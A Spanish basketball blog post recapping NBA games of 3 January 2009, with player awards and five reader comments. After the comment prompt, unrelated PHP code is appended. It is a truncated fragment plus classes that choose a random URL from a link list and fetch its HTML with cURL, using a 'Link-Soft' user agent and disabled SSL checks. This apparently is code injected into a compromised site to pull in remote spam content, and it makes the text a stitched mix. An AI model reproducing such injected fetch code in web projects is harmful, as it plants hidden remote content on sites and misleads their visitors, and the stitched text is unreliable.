La crónica (3/01/2009)

04 de January de 2009 por txusma

Alguien comentaba ayer en el blog que Carmelo es también un gran clutch-player, esa clase de jugadores que no se esconde en los momentos importantes y que no le quema el balón cuando alguien ha de jugarse los tiros decisivos. Si ante los Thunder selló el triunfo de su equipo con un triple a falta de 0.1 segundos ayer anotó una importantísima canasta a falta de 50 segundos cuando los Hornets habían conseguido ponerse por delante en el marcador tras remontar 26 puntos en los últimos 18 minutos. Antes los titulares de los Nuggets habían cuajado un gran partido pero tuvieron que volver a la cancha a arreglar el desaguisado de los suplentes. Un dato: desde el traspaso de Iverson y la llegada de Billups los Nuggets han ganado 22 de sus últimos 31 partidos.

En San Antonio los Spurs también se dejaron remontar una gran diferencia y también tuvieron que recurrir a un tiro postrero para llevarse la victoria. Parker recogió un rebote en ataque a falta de un segundo y anotó la canasta ganadora con el tiempo cumplido. En el primer cuarto San Antonio echó del partido a Philadelphia a base de triples (nada más y nada menos que 8), llegando a acumular 21 puntos de ventaja pero paulatinamente los Sixers fueron acercándose en el marcador de la mano de Miller e Iguodala hasta tener la oportunidad de ganar el partido a falta de 15 segundos. Los 15 triples que anotaron ayer los Spurs se quedan a uno del récord de la franquicia. Los Sixers… a lo suyo.

Hace 2 días los Hawks cayeron frente a los Nets merced a un triple de Carter en el último segundo. Ayer la historia la contaron al revés: Mike Bibby anotó a falta de un segundo el triple que les daba la victoria frente a unos Rockets que no pudieron contar ni con Artest ni con T-Mac. Justicia poética creo que lo llaman. La historia de Houston parece acabarse antes de empezar.

Precisamente los Nets también recibieron su propia medicina al caer en la prórroga frente a Miami y es que cuando Wade coge las riendas es dificílisimo pararlo. Tanto en ataque con en defensa volvió loco a los Nets en los últimos minutos y fue el estilete de un equipo que remontó una diferencia de 16 puntos.

Y en el resto de la jornada, los Bulls confirman la increíble empanada que atraviesan con una derrota frente a los Wolves, ex-“equipo medicina” que ha visto su juego mejorado con la vuelta de Mike Miller y las importantes aportaciones de Kevin Love. Por su parte, Indiana superó a los Kings en el partido “Warrior” del día (el de máayor puntuación conjunta) a pesar de los 45 puntos desde el banco de Kevin Martin y los Bobcats se tomaron la revancha de los Bucks con un Diaw que recuerda a aquel de hace un par de temporadas.

Veamos las 10 mejores jugadas de ayer. De obligada visión el tapón de Wade a López, el mate de Keyon Dooling y la canasta de la victoria de Parker. Calidad de la buena:

PREMIOS

MVP: Parecerá un sacrilegio no darle el MVP de la jornada a alguien que anota 45 puntos pero la exhibición de ayer de Wade a ambos lado de la cancha se lo merece de todas, todas. 29 puntos, 8 rebotes, 6 asistencias, 3 robos y 4 tapones. Ahí queda eso.

Rookie: Grandes partidos de Derrick Rose y Kevin Love, pero el premio para el rookie que posiblemente más esté decepcionando esta campaña: Michael Beasley. 17 puntos, 7 rebotes y buenos porcentajes de tiro le avalan esta jornada.

La sorpresa: Ayer las bajas de Devin Harris en los Nets y Tyson Chandler en los Hornets no se notaron porque sus sustitutos estuvieron mayúsculos. 23 puntos para Keyon Dooling y 17 para Hilton Armstrong.

La decepción:Repiten los Sixers, con un Dalembert irreconocible y se le unen los Bulls, donde seguimos sin entender la titularidad de Shefolosha.

El mayor esfuerzo en vano: Ahora si. Los 45 puntos de Kevin Martin bien se merecen un galardón al que también estaban nominados los 30 puntos y 11 asistencias de Chris Paul.

Comenta

5 comentarios a esta entrada

  1. Sergio dice:
    #1

    cuantos partidos han ganado este año los spurs con un “buzzer-beater” ? yo recuerdo por lo menos 2 con triples de roger mason.. otros dos de parker… y me suena q hubo algunos mas para hill o ginobili o finley… Que manera de competir la de los espuelas estos… creo q son ahora mismo los favoritos para perder contra lakers en las finales… jaja

      Citar

  2. TheDeerHunter dice:
    #2

    Pues yo por si las moscas rezaría por no encontrarme con ellos en ningún cruce.

      Citar

  3. El_Pecharroman dice:
    #3

    Al loro con la sorpresa que se está dando ahora mismo en la NBA. Cleveland pierde en Washington D.C. de 11 a falta de apenas seis minutos, en parte gracias a un paupérrimo porcentaje de tiro (37’1 %) y a un LeBron algo más opaco que de costumbre (5 pérdidas de balón, aunque con 23 puntos y 9 asistencias). Por Washington, muy bien Jamison (20-11). Aún así, la cosa está siendo poco brillante en cuanto a anotación: 71-60.

    Por otro lado, en Toronto victoria para los Raptors sobre Orlando Magic, que se ha encontrado a Dwight Howard más brillante en la anotación (39) y menos dominador en la zona (8 rebotes, 1 tapón). En los Raptors, el rol de base lo han desempeñado Salomon y Ukic con resultado desigual: el balcánico ha ganado la partida, repartiendo 4 asistencias más que Will. Sin embargo, el que se ha salido es Anthony Parker con 26 puntos y sólo tres tiros fallados.

    Termino el comentario diciendo que Cleveland se ha acercado en el marcador a Washington: -6 a 3 minutos del final. Uy.

      Citar

  4. Txusma dice:
    #4

    Confirmada la victoria de Washington. Carnaza para la cronica de mañana 😀

      Citar

  5. telekoman dice:
    #5

    Sí, y ojito a los 19 puntos de Marc al descanso contra Dallas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>